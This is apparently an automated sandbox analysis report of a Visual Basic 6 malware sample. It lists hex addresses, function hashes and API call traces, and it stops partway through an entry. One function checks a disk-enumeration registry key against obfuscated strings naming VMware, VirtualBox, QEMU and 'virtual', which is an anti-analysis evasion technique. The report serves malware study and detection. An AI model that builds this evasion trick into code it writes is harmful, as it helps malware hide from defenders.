0x0042a911
0x00000000
0x0042a913
0x0042a913
0x00000000
0x00000000
0x00000000
0x00000000
0x0042a913
0x0042a911
0x0042a908
0x0042a8af
0x0042a8af
0x0042a915
0x0042a915
0x0042a916
0x0042a918
0x0042a919
0x0042a91d
0x0042a924
0x00000000
0x0042a8b1
0x0042a8b1
0x0042a8b3
0x0042a8b4
0x0042a8b6
0x00000000
0x0042a8b6
0x0042a8af
0x0042a8ad
0x0042a8ab
0x0042a85e
0x0042a85e
0x0042a85f
0x0042a863
0x0042a864
0x0042a865
0x0042a866
0x0042a867
0x0042a867
0x0042a868
0x0042a8d7
0x0042a8d7
0x0042a8db
0x00000000
0x0042a86a
0x0042a86a
0x0042a8b7
0x0042a8b7
0x0042a8b8
0x0042a8bd
0x0042a8bf
0x0042a8c6
0x0042a8c8
0x0042a8cb
0x0042a8cc
0x0042a8ce
0x0042a8cf
0x0042a8d1
0x0042a8d4
0x0042a93e
0x0042a93e
0x0042a93f
0x0042a93f
0x0042a940
0x0042a940
0x0042a941
0x0042a942
0x0042a943
0x0042a9ad
0x00000000
0x0042a945
0x0042a945
0x00000000
0x0042a947
0x0042a947
0x0042a949
0x0042a949
0x0042a94a
0x0042a94b
0x0042a9b1
0x0042a9b1
0x0042a9b1
0x00000000
0x0042a94d
0x0042a94d
0x0042a9b2
0x0042a9b2
0x00000000
0x0042a9b4
0x0042a9b4
0x0042a9b7
0x00000000
0x0042a9b9
0x0042a9b9
0x0042a9ba
0x00000000
0x0042a9bc
0x0042a9bc
0x00000000
0x00000000
0x00000000
0x00000000
0x0042a9bc
0x0042a9ba
0x0042a9b7
0x0042a94f
0x0042a94f
0x0042a950
0x00000000
0x0042a952
0x0042a952
0x0042a954
0x0042a955
0x0042a958
0x0042a959
0x00000000
0x0042a95a
0x0042a950
0x0042a94d
0x0042a94b
0x0042a945
0x0042a8d6
0x0042a8d6
0x00000000
0x0042a8d6
0x0042a86c
0x0042a86c
0x0042a8a1
0x0042a86e
0x0042a86e
0x0042a86f
0x0042a86f
0x0042a873
0x0042a8dd
0x0042a8dd
0x0042a8df
0x0042a8df
0x0042a8e0
0x0042a95e
0x0042a95e
0x0042a962
0x0042a963
0x0042a963
0x0042a964
0x0042a9bf
0x0042a9bf
0x0042a9bf
0x0042a9c6
0x0042a9c7
0x00000000
0x0042a9c9
0x0042a9c9
0x0042a9ca
0x00000000
0x0042a9cc
0x0042a9cc
0x00000000
0x0042a9ce
0x0042a9ce
0x0042a9cf
0x0042a9d0
0x0042aa3d
0x0042aa3e
0x00000000
0x0042a9d2
0x0042a9d2
0x0042a9d4
0x0042a9d5
0x00000000
0x0042a9d5
0x0042a9d0
0x0042a9cc
0x0042a9ca
0x0042a967
0x0042a96a
0x0042a96b
0x0042a96c
0x0042a96d
0x0042a96f
0x0042a970
0x0042a972
0x0042a973
0x0042a974
0x0042a976
0x0042a979
0x0042a97a
0x0042a97b
0x0042a97b
0x0042a97d
0x0042a97e
0x0042a9d7
0x0042a9d8
0x0042a9d9
0x0042a9dc
0x0042a9dd
0x0042a9de
0x00000000
0x0042a980
0x0042a980
0x0042a982
0x0042a983
0x0042a983
0x0042a984
0x0042a984
0x0042a985
0x0042a986
0x0042a988
0x0042a98a
0x0042a98b
0x0042a9f6
0x00000000
0x0042a9f8
0x0042a9f8
0x0042aa2d
0x0042aa2d
0x00000000
0x0042aa2f
0x0042aa2f
0x00000000
0x0042aa31
0x0042aa31
0x00000000
0x0042aa33
0x0042aa34
0x0042aa37
0x0042aa38
0x0042aa39
0x0042aa39
0x0042aa39
0x0042aa39
0x0042aa31
0x0042aa2f
0x0042a9fa
0x0042a9fa
0x0042a9fb
0x0042a9fc
0x0042a9fd
0x0042aa62
0x0042aa63
0x0042aa64
0x0042aa65
0x0042aa66
0x0042aa69
0x0042aa6a
0x0042aa6b
0x0042aa70
0x0042aa71
0x0042aa72
0x00000000
0x0042a9ff
0x0042a9ff
0x0042aa01
0x0042aa01
0x0042aa04
0x0042aa04
0x0042aa3f
0x0042aa3f
0x0042aa40
0x0042aa41
0x0042aa43
0x0042aa06
0x0042aa06
0x00000000
0x0042aa08
0x0042aa08
0x0042aa09
0x0042aa0a
0x0042aa75
0x0042aa75
0x0042aa76
0x0042aae6
0x0042aae6
0x0042aaea
0x00000000
0x0042aa78
0x0042aa78
0x0042aa7d
0x0042aa7e
0x0042aa7f
0x0042aa80
0x0042aa81
0x0042aa82
0x0042aa84
0x0042aa84
0x0042aa85
0x00000000
0x0042aa87
0x0042aa87
0x0042aa87
0x0042aa88
0x0042aabf
0x00000000
0x0042aac1
0x0042aac1
0x0042aac2
0x0042ab3a
0x0042ab41
0x0042ab43
0x0042ab45
0x0042aac4
0x0042aac4
0x0042aac5
0x0042aac6
0x0042aac6
0x0042aac8
0x0042aaca
0x0042aacc
0x0042aad0
0x0042aad2
0x0042aad4
0x0042aad6
0x0042aad8
0x0042aada
0x0042aadc
0x0042aade
0x0042aae0
0x0042aae2
0x00000000
0x0042aae2
0x00000000
0x0042aacc
0x00000000
0x0042aaca
0x0042aac8
0x0042aac2
0x0042aa8a
0x0042aa90
0x0042aa91
0x0042aa92
0x0042aa95
0x0042aa96
0x00000000
0x0042aa98
0x0042aa98
0x00000000
0x0042aa98
0x0042aa96
0x0042aa88
0x0042aa85
0x0042aa0c
0x0042aa0c
0x0042aa5f
0x0042aa5f
0x0042aa60
0x0042aa0e
0x0042aa0e
0x0042aa0f
0x0042aa10
0x0042aa12
0x0042aa13
0x0042aa56
0x00000000
0x0042aa58
0x0042aa58
0x0042aabd
0x0042aabd
0x0042aa5a
0x0042aa5a
0x0042aa5b
0x0042aa5c
0x0042aab0
0x0042aab2
0x0042aab4
0x0042aab5
0x00000000
0x0042aab7
0x0042aab7
0x0042aaba
0x0042aabb
0x0042aabc
0x00000000
0x0042aabc
0x0042aa5e
0x0042aa5e
0x0042aa5e
0x00000000
0x0042aa5e
0x0042aa5c
0x0042aa58
0x0042aa15
0x0042aa15
0x0042aa16
0x0042aa18
0x0042aa18
0x0042aa1a
0x0042aa1a
0x0042aa1b
0x0042aa1c
0x0042aa1d
0x0042aa1d
0x0042aa1e
0x0042aa1f
0x0042aa24
0x0042aa24
0x0042aa25
0x0042aa25
0x0042aa26
0x0042aa99
0x0042aa99
0x0042aa9a
0x0042aa9b
0x0042aa9b
0x0042aa9c
0x0042aa9d
0x0042aa9d
0x0042aa9e
0x0042aa9e
0x0042aa9e
0x0042aa9f
0x0042aaa0
0x0042aaeb
0x0042aaeb
0x0042aaed
0x0042aaed
0x0042aaef
0x0042aaef
0x0042aaf2
0x0042aaf3
0x0042aaf5
0x0042aaf7
0x0042aaf8
0x0042aaf8
0x0042aafb
0x0042aafd
0x0042aaff
0x0042aaff
0x0042ab00
0x0042ab03
0x0042ab03
0x0042ab06
0x0042ab08
0x0042ab0a
0x0042ab0c
0x0042ab0e
0x0042ab11
0x0042ab13
0x0042ab15
0x0042ab17
0x0042ab17
0x0042ab18
0x0042ab1a
0x0042ab1c
0x0042ab1d
0x0042ab1f
0x0042ab21
0x0042ab23
0x0042ab24
0x0042ab24
0x0042aaa2
0x0042aaa2
0x0042aaa3
0x0042aaa3
0x0042aa28
0x0042aa28
0x0042aa28
0x00000000
0x0042aa28
0x0042aa26
0x0042aa13
0x0042aa0c
0x0042aa0a
0x0042aa06
0x0042aa04
0x0042a9fd
0x0042a9f8
0x0042a98d
0x0042a98d
0x0042a98e
0x0042a98e
0x0042a98f
0x0042a9df
0x0042a9df
0x0042a991
0x0042a991
0x0042a995
0x0042a996
0x0042a999
0x0042a9ed
0x0042a9ee
0x0042aa46
0x0042aa4a
0x0042aa4b
0x0042aa4e
0x0042aa51
0x0042aa51
0x0042aaac
0x0042aa53
0x0042aa53
0x0042aa54
0x0042aa55
0x0042aa55
0x0042aa55
0x0042aa55
0x0042a9f0
0x0042a9f0
0x0042a9f1
0x0042a9f1
0x0042a9f1
0x0042a99b
0x0042a99b
0x0042a99c
0x0042a99d
0x0042a99e
0x0042a99f
0x0042a9a0
0x0042a9a0
0x0042a9a0
0x0042a999
0x0042a98f
0x0042a98b
0x0042a97e
0x0042a8e2
0x0042a8e2
0x0042a8e3
0x0042a8e3
0x0042a875
0x0042a875
0x0042a876
0x0042a876
0x0042a873
0x0042a86c
0x0042a86a
0x0042a868
0x0042ab46
0x0042ab48
0x0042ab4a
0x0042ab50
0x0042ab52
0x0042ab58
0x0042ab58
0x0042ab58
0x0042ab5c
0x0042ab7e
0x0042ab7e
0x0042ab81
0x0042ab8a
0x0042ab8c
0x0042ab8d
0x0042ab8e
0x00000000
0x0042ab5e
0x0042ab5e
0x0042ab60
0x0042ab60
0x0042ab63
0x0042ab65
0x0042ab66
0x0042ab69
0x0042ab69
0x0042ab6c
0x0042ab6d
0x0042ab6f
0x0042ab72
0x0042ab75
0x0042ab76
0x0042ab79
0x0042ab7d
0x00000000
0x0042ab7d
0x0042ab8f
0x0042ab8f
0x0042ab93
0x0042ab99
0x0042ab9b
0x0042ab9c
0x0042ab9e
0x0042ab9f
0x0042aba0
0x0042aba1
0x0042aba5
0x0042aba7
0x0042aba7
0x0042abaa
0x0042abb0
0x0042abb3
0x0042abb4
0x0042abb4
0x0042abba
0x0042abc0
0x0042abc0
0x0042abc6
0x0042abc8
0x0042abd1
0x0042abd1
0x0042abd1
0x0042abd1
0x0042ab5e
0x0042abd4
0x0042abd5
0x0042abd6
0x0042abd7
0x0042abdd
0x0042abde
0x0042abe0
0x0042abe1
0x0042abe8
0x0042abef
0x0042abf0
0x0042abf1
0x0042abf2
0x0042abf5
0x0042abf7
0x0042abf9
0x0042abfa
0x0042abfb
0x0042abfc
0x0042abff
0x0042ac01
0x0042ac03
0x0042ac05
0x0042ac07
0x0042ac09
0x0042ac09
0x0042ac0e
0x0042ac13
0x0042ac15
0x0042ac1b
0x0042ac1d
0x0042ac24
0x0042ac2c
0x0042ac2d
0x0042ac32
0x0042ac37
0x0042ac39
0x0042ac3a
0x0042ac3d
0x0042ac3d
0x0042ac42
0x0042ac45
0x0042ac48
0x0042ac4a
0x0042ac4c
0x0042ac56
0x0042ac5e
0x0042ac61
0x0042ac66
0x0042ac67
0x0042ac69
0x0042ac6a
0x0042ac6a
0x0042ac6a
0x0042ac70
0x0042ac70
0x0042ac75
0x0042acec
0x0042acec
0x0042acef
0x0042acf1
0x0042acf2
0x00000000
0x0042ac78
0x0042ac78
0x0042ac7b
0x0042ac7e
0x0042ac81
0x0042ac84
0x0042ac88
0x0042ac88
0x0042ac8a
0x0042ac8b
0x0042ac8f
0x0042ac90
0x00000000
0x00000000
0x0042ac92
0x0042ac94
0x0042ac95
0x0042ac96
0x0042ac97
0x0042ac99
0x0042ac9c
0x0042ac9f
0x0042aca2
0x0042aca7
0x0042aca8
0x0042acad
0x0042acb0
0x0042acb4
0x0042acb5
0x0042acb6
0x0042acb8
0x00000000
0x0042acba
0x0042acba
0x0042acba
0x0042acbc
0x0042acbe
0x0042ad33
0x0042ad33
0x0042ad35
0x0042ad38
0x0042acc0
0x0042acc0
0x0042ad25
0x0042ad27
0x0042ad29
0x0042ad2a
0x00000000
0x0042ad2a
0x00000000
0x0042acc2
0x0042acc2
0x0042acc9
0x0042accb
0x0042accf
0x0042accf
0x0042acd2
0x0042ad2c
0x0042ad2c
0x0042ad2c
0x0042ad2d
0x0042ad2d
0x0042ad2e
0x0042ad31
0x00000000
0x0042acd4
0x0042acd4
0x0042acd6
0x0042acd7
0x0042acd9
0x0042acdc
0x0042ace0
0x0042ace3
0x0042ace4
0x0042ace7
0x0042acea
0x00000000
0x0042aceb
0x0042acd2
0x0042acc0
0x0042acbe
0x00000000
0x0042acb8
0x0042acf3
0x0042acf3
0x0042acf6
0x0042acf7
0x0042acfa
0x0042acfd
0x0042acfe
0x0042acfe
0x0042acfe
0x0042ad01
0x0042ad13
0x0042ad13
0x00000000
0x0042ad13
0x0042ad03
0x0042ad06
0x0042ad0f
0x0042ad11
0x00000000
0x0042ad11
0x0042ad0f
0x0042ad15
0x0042ad15
0x00000000

Memory Dump Source

Source File: 00000012.00000002.782181214.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.782162276.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000012.00000002.782388581.0000000000440000.00000002.00020000.sdmp Download File
Associated: 00000012.00000002.782411560.0000000000441000.00000004.00020000.sdmp Download File
Associated: 00000012.00000002.782434479.0000000000443000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b7d6096c34773fd4d531965e4b462d2fed297d812f1bba1b160a30291432e4bf
Instruction ID: 782e8e9d8451be083b1247396952c17d360a38393dd9e3b03fe1b8e65f72e23f
Opcode Fuzzy Hash: b7d6096c34773fd4d531965e4b462d2fed297d812f1bba1b160a30291432e4bf
Instruction Fuzzy Hash: 3412776020D7E16FD7178B30AD665A37FA4EF1331479985DFC8C28A063D21C58A6C7AB

Uniqueness

Uniqueness Score: -1.00%

Function 0043E94B, Relevance: .1, Instructions: 79COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.782181214.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.782162276.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000012.00000002.782388581.0000000000440000.00000002.00020000.sdmp Download File
Associated: 00000012.00000002.782411560.0000000000441000.00000004.00020000.sdmp Download File
Associated: 00000012.00000002.782434479.0000000000443000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7521e9a84b7b90d29f6881595c5f7fefcd9f4f8b3a6da822873afce71a6de7b4
Instruction ID: bd9da3e52d386e5fdb038062d57df60f2ec042059c44d0c7bdf384b62571b843
Opcode Fuzzy Hash: 7521e9a84b7b90d29f6881595c5f7fefcd9f4f8b3a6da822873afce71a6de7b4
Instruction Fuzzy Hash: 3A21067194D3C29ED3A39F7444252E6BFB1AE4B3183AD64EFC4C04E467C6258483C741

Uniqueness

Uniqueness Score: -1.00%

Function 00435DBD, Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.782181214.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.782162276.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000012.00000002.782388581.0000000000440000.00000002.00020000.sdmp Download File
Associated: 00000012.00000002.782411560.0000000000441000.00000004.00020000.sdmp Download File
Associated: 00000012.00000002.782434479.0000000000443000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4674963e104f2786d790fa100fe697cbd824d576ed967674192e30e080a7303e
Instruction ID: 3fd841d7eb3b0847a2db43d6d443d6bc956b496163d22fc419d0a7fc77ba37e8
Opcode Fuzzy Hash: 4674963e104f2786d790fa100fe697cbd824d576ed967674192e30e080a7303e
Instruction Fuzzy Hash: B511ED71804388AFDB11DB74CC089DABFE4EF13318F0502DAD8A59B0E2E7749A49CB42

Uniqueness

Uniqueness Score: -1.00%

Function 004252D0, Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.782181214.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.782162276.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000012.00000002.782388581.0000000000440000.00000002.00020000.sdmp Download File
Associated: 00000012.00000002.782411560.0000000000441000.00000004.00020000.sdmp Download File
Associated: 00000012.00000002.782434479.0000000000443000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ef41f23567e4e7422021a95af9bb6b13c8200b2295415d293bf1cf4d9d63b1a6
Instruction ID: 6267075ee8de70c80964b9234b1eaabb9bd5065dbc882aedec93f01277836922
Opcode Fuzzy Hash: ef41f23567e4e7422021a95af9bb6b13c8200b2295415d293bf1cf4d9d63b1a6
Instruction Fuzzy Hash: 50018632720926CBCB30EB14E4409A6B3A6E770790BD55063DC0587B14D3BDED81D66A

Uniqueness

Uniqueness Score: -1.00%

Function 00424FD2, Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.782181214.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.782162276.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000012.00000002.782388581.0000000000440000.00000002.00020000.sdmp Download File
Associated: 00000012.00000002.782411560.0000000000441000.00000004.00020000.sdmp Download File
Associated: 00000012.00000002.782434479.0000000000443000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 403b859c92bb87a22b3b23818d0f9761360f240456280570c354f149d4e95fe8
Instruction ID: 6d8b77ee072ee247f30958288c4a888cb08176c89a0772219baa462f0e89e92b
Opcode Fuzzy Hash: 403b859c92bb87a22b3b23818d0f9761360f240456280570c354f149d4e95fe8
Instruction Fuzzy Hash: 48B09234342640CFC205CE29C180F1473E8BB04A90F0244D0B800CB662C228ED80DA10

Uniqueness

Uniqueness Score: -1.00%

Function 00424FE7, Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.782181214.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.782162276.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000012.00000002.782388581.0000000000440000.00000002.00020000.sdmp Download File
Associated: 00000012.00000002.782411560.0000000000441000.00000004.00020000.sdmp Download File
Associated: 00000012.00000002.782434479.0000000000443000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4c43a5081fe5d2bb3cd1689569c8f68dab492a46559b42270ac0312c03ebc32d
Instruction ID: 95dff2fb833417202495218693bf5b1a421dd4471ca0001524ddc04ad995461f
Opcode Fuzzy Hash: 4c43a5081fe5d2bb3cd1689569c8f68dab492a46559b42270ac0312c03ebc32d
Instruction Fuzzy Hash: 46B0123F0716C44DDB13CF3442137E93B6593004C0F5404C1D0C04B66BC00C8687D556

Uniqueness

Uniqueness Score: -1.00%

Function 00424FFB, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.782181214.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.782162276.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000012.00000002.782388581.0000000000440000.00000002.00020000.sdmp Download File
Associated: 00000012.00000002.782411560.0000000000441000.00000004.00020000.sdmp Download File
Associated: 00000012.00000002.782434479.0000000000443000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 09929421d99742cfa4a401d3ddfe35bd1712795acecd8ac35f43a2c4d427f48e
Instruction ID: 75d8ee55a9432d655d400c20f764b696a43bdfdc0ccd3be24d65f6ea96f8add4
Opcode Fuzzy Hash: 09929421d99742cfa4a401d3ddfe35bd1712795acecd8ac35f43a2c4d427f48e
Instruction Fuzzy Hash: 0CB012241015C18EC9024F1041127A877A0D7019C0F0A00C494C04B513C11C8645A610

Uniqueness

Uniqueness Score: -1.00%

Function 00428A60, Relevance: 66.7, APIs: 33, Strings: 5, Instructions: 211registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00428560: __vbaStrCopy.MSVBVM60(660E6C30,00000000,660DDE99), ref: 004285A0
Part of subcall function 00428560: #653.MSVBVM60(?,?), ref: 004285BB
Part of subcall function 00428560: __vbaI4Var.MSVBVM60(?), ref: 004285C5
Part of subcall function 00428560: __vbaFreeVar.MSVBVM60 ref: 004285DB
Part of subcall function 00428560: __vbaStrMove.MSVBVM60(?,?,00000001,?), ref: 00428601
Part of subcall function 00428560: __vbaStrCat.MSVBVM60(00000000), ref: 00428604
Part of subcall function 00428560: __vbaStrMove.MSVBVM60 ref: 0042860F
Part of subcall function 00428560: __vbaFreeStr.MSVBVM60 ref: 00428614
Part of subcall function 00428560: __vbaFreeStr.MSVBVM60(00428651), ref: 0042864A

__vbaStrMove.MSVBVM60(S*Y*S*T*E*M*\*C*o*n*t*r*o*l*S*e*t*0*0*1*\*S*e*r*v*i*c*e*s*\*D*i*s*k*\*E*n*u*m*,66106AEE,00000000,660DC30A), ref: 00428ABB
#644.MSVBVM60(00000000), ref: 00428ABE
RegOpenKeyExW.ADVAPI32(80000002,00000000,00000000,00020019,?), ref: 00428AD7
__vbaFreeStr.MSVBVM60 ref: 00428AEF
#526.MSVBVM60(?,000000FF), ref: 00428B03
__vbaStrVarMove.MSVBVM60(?), ref: 00428B0D
__vbaStrMove.MSVBVM60 ref: 00428B18
__vbaStrCopy.MSVBVM60 ref: 00428B22
__vbaFreeStr.MSVBVM60 ref: 00428B2B
__vbaFreeVar.MSVBVM60 ref: 00428B30
#644.MSVBVM60(004026B8), ref: 00428B3B
#644.MSVBVM60 ref: 00428B4C
RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,?,?), ref: 00428B76
#617.MSVBVM60(?,?,000000FE), ref: 00428BA9
#528.MSVBVM60(?,?), ref: 00428BB7
__vbaStrVarMove.MSVBVM60(?), ref: 00428BC1
__vbaStrMove.MSVBVM60 ref: 00428BCC
__vbaStrCopy.MSVBVM60 ref: 00428BD6
__vbaFreeStr.MSVBVM60 ref: 00428BDF
__vbaFreeVarList.MSVBVM60(00000002,?,?), ref: 00428BEB
__vbaStrMove.MSVBVM60(*+V+I+R+T+U+A+L+*+), ref: 00428C0B
__vbaStrCmp.MSVBVM60(00000000), ref: 00428C0E
__vbaFreeStr.MSVBVM60 ref: 00428C20
__vbaStrMove.MSVBVM60(*<V<M<W<A<R<E<*<,00000000), ref: 00428C46
__vbaStrCmp.MSVBVM60(00000000), ref: 00428C49
__vbaFreeStr.MSVBVM60 ref: 00428C5B
__vbaStrMove.MSVBVM60(*$V$B$O$X$*$), ref: 00428C81
__vbaStrCmp.MSVBVM60(00000000), ref: 00428C84
__vbaFreeStr.MSVBVM60 ref: 00428C96
__vbaStrMove.MSVBVM60(*?Q?E?M?U?*?), ref: 00428CBB
__vbaStrCmp.MSVBVM60(00000000), ref: 00428CBE
__vbaFreeStr.MSVBVM60 ref: 00428CD0
RegCloseKey.ADVAPI32(?), ref: 00428CE2

Strings

*<V<M<W<A<R<E<*<, xrefs: 00428C37
*$V$B$O$X$*$, xrefs: 00428C72
*+V+I+R+T+U+A+L+*+, xrefs: 00428BFC
*?Q?E?M?U?*?, xrefs: 00428CAC
S*Y*S*T*E*M*\*C*o*n*t*r*o*l*S*e*t*0*0*1*\*S*e*r*v*i*c*e*s*\*D*i*s*k*\*E*n*u*m*, xrefs: 00428A8B

Memory Dump Source

Source File: 00000012.00000002.782181214.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.782162276.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000012.00000002.782388581.0000000000440000.00000002.00020000.sdmp Download File
Associated: 00000012.00000002.782411560.0000000000441000.00000004.00020000.sdmp Download File
Associated: 00000012.00000002.782434479.0000000000443000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: __vba$Free$Move$#644Copy$#526#528#617#653CloseListOpenQueryValue
String ID: *$V$B$O$X$*$$*+V+I+R+T+U+A+L+*+$*<V<M<W<A<R<E<*<$*?Q?E?M?U?*?$S*Y*S*T*E*M*\*C*o*n*t*r*o*l*S*e*t*0*0*1*\*S*e*r*v*i*c*e*s*\*D*i*s*k*\*E*n*u*m*
API String ID: 3472048080-959839144
Opcode ID: 716754a4341b21e52730b0445e390d7e0ddf8e37c75de30023aa47911c17bfc8
Instruction ID: d931c8922b837fb44782458b145f6e1677ce55578a5bcf832f4f2986d22a24a2
Opcode Fuzzy Hash: 716754a4341b21e52730b0445e390d7e0ddf8e37c75de30023aa47911c17bfc8
Instruction Fuzzy Hash: D37130759102299FCB14DFE4EC49EEEB775FF49700F104229E502A72A4DF785905CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 004255D0, Relevance: 31.6, APIs: 21, Instructions: 150COMMON

Download Yara Rule

APIs

__vbaStrCopy.MSVBVM60 ref: 0042561C
__vbaVarDup.MSVBVM60 ref: 00425636
#607.MSVBVM60(?,00000104,?), ref: 00425649
__vbaStrVarMove.MSVBVM60(?), ref: 00425653
__vbaStrMove.MSVBVM60 ref: 0042565E
__vbaFreeVarList.MSVBVM60(00000002,?,?), ref: 0042566E
__vbaRedim.MSVBVM60(00000880,00000010,?,00000000,00000001,00000002,00000000), ref: 00425685
#644.MSVBVM60(?), ref: 00425698
__vbaVarMove.MSVBVM60 ref: 004256BD
#644.MSVBVM60(?), ref: 004256C3
__vbaVarMove.MSVBVM60 ref: 004256F0
__vbaVarMove.MSVBVM60 ref: 00425714
__vbaErase.MSVBVM60(00000000,?), ref: 0042573C
#617.MSVBVM60(?,00000003,00000000), ref: 0042575C
__vbaStrVarMove.MSVBVM60(?), ref: 00425766
__vbaStrMove.MSVBVM60 ref: 00425771
__vbaFreeVar.MSVBVM60 ref: 0042577A
__vbaStrCopy.MSVBVM60 ref: 00425787
__vbaStrCopy.MSVBVM60 ref: 00425793
__vbaFreeStr.MSVBVM60(004257E0), ref: 004257D8
__vbaFreeStr.MSVBVM60 ref: 004257DD

Memory Dump Source

Source File: 00000012.00000002.782181214.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.782162276.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000012.00000002.782388581.0000000000440000.00000002.00020000.sdmp Download File
Associated: 00000012.00000002.782411560.0000000000441000.00000004.00020000.sdmp Download File
Associated: 00000012.00000002.782434479.0000000000443000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: __vba$Move$Free$Copy$#644$#607#617EraseListRedim
String ID:
API String ID: 2391472805-0
Opcode ID: a62ebe96bc8a08652cb7659d508db60047e005564e55aaa217dc5b8baebd9ab1
Instruction ID: f158d307086c995230baffbab077414745f6fab795e8a07b6ea531946eaafd01
Opcode Fuzzy Hash: a62ebe96bc8a08652cb7659d508db60047e005564e55aaa217dc5b8baebd9ab1
Instruction Fuzzy Hash: B6516DB4D00219DFDB04DFE8E988AEDBBB5FF48700F108129E506A7254DB74AA45CF54

Uniqueness

Uniqueness Score: -1.00%

Function 004274C0, Relevance: 22.6, APIs: 15, Instructions: 142COMMON

Download Yara Rule

APIs

#648.MSVBVM60(?), ref: 00427521
__vbaFreeVar.MSVBVM60 ref: 0042752D
__vbaStrCmp.MSVBVM60(004031F0,00000000), ref: 00427544
#645.MSVBVM60(?,00000000), ref: 00427561
__vbaStrMove.MSVBVM60 ref: 0042756C
__vbaStrCmp.MSVBVM60(004031F0,00000000), ref: 00427578
__vbaFreeStr.MSVBVM60 ref: 00427586
__vbaFreeStr.MSVBVM60(0042769B), ref: 00427694

Memory Dump Source

Source File: 00000012.00000002.782181214.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.782162276.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000012.00000002.782388581.0000000000440000.00000002.00020000.sdmp Download File
Associated: 00000012.00000002.782411560.0000000000441000.00000004.00020000.sdmp Download File
Associated: 00000012.00000002.782434479.0000000000443000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: __vba$Free$#645#648Move
String ID:
API String ID: 2957232524-0
Opcode ID: bbbb9a504d2d2028516dfd84ef59ce5abafeb933a8e32970d51a4000ec899468
Instruction ID: b472091806514a5b406742983bf7654c8798439ffb52f025013a0647670433c7
Opcode Fuzzy Hash: bbbb9a504d2d2028516dfd84ef59ce5abafeb933a8e32970d51a4000ec899468
Instruction Fuzzy Hash: AB512CB5D01219EFCB00DF95D984AEEBBB4FF49714F60812AE509A7290D7345A05CF98

Uniqueness

Uniqueness Score: -1.00%

Function 00427230, Relevance: 18.1, APIs: 12, Instructions: 107COMMON

Download Yara Rule

APIs

__vbaObjSetAddref.MSVBVM60(?,00440248,660DA008,00401006,660D9FAF), ref: 0042727B
__vbaHresultCheckObj.MSVBVM60(00000000,?,004025F8,0000000C), ref: 004272A6
__vbaVarDup.MSVBVM60 ref: 004272D6
#607.MSVBVM60(?,?,?), ref: 004272E8
__vbaStrVarMove.MSVBVM60(?), ref: 004272F2
__vbaStrMove.MSVBVM60 ref: 004272FD
__vbaFreeVarList.MSVBVM60(00000002,?,?), ref: 0042730D
#644.MSVBVM60(?), ref: 0042731A
__vbaHresultCheckObj.MSVBVM60(00000000,?,004025F8,0000000C), ref: 00427346
__vbaStrCopy.MSVBVM60 ref: 00427352
__vbaFreeObj.MSVBVM60(00427395), ref: 00427385
__vbaFreeStr.MSVBVM60 ref: 0042738E

Memory Dump Source

Source File: 00000012.00000002.782181214.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.782162276.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000012.00000002.782388581.0000000000440000.00000002.00020000.sdmp Download File
Associated: 00000012.00000002.782411560.0000000000441000.00000004.00020000.sdmp Download File
Associated: 00000012.00000002.782434479.0000000000443000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: __vba$Free$CheckHresultMove$#607#644AddrefCopyList
String ID:
API String ID: 315378923-0
Opcode ID: f5c6429fe300b1c383ee8608cac703d15338279dafb14a57ceedfcd35afb2356
Instruction ID: 4620c8245746b9960229e3d41c841cec7c7da01c64fd2b9608c8434163d736c1
Opcode Fuzzy Hash: f5c6429fe300b1c383ee8608cac703d15338279dafb14a57ceedfcd35afb2356
